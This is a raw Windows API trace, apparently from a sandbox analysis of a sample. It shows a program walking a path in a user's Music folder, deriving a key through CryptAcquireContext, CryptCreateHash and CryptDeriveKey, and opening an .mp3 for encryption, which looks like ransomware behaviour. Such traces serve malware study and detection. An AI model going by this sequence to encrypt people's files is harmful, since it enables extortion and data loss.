[0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.873] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0185.873] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.873] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c108870, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x200a6cc0, ftLastAccessTime.dwHighDateTime=0x1d5e384, ftLastWriteTime.dwLowDateTime=0x200a6cc0, ftLastWriteTime.dwHighDateTime=0x1d5e384, nFileSizeHigh=0x0, nFileSizeLow=0x1227f, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="O8LnB5uJ.mp3", cAlternateFileName="")) returned 0x90af58 [0185.874] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0185.874] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.874] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.874] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0185.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0185.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.874] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0185.875] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0185.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.875] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0185.875] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.875] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.875] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0185.875] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0185.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.876] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0185.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.876] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.876] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0185.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.876] CryptDestroyHash (hHash=0x90ae18) returned 1 [0185.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\o8lnb5uj.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0185.877] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.877] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0185.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0185.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.877] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.877] 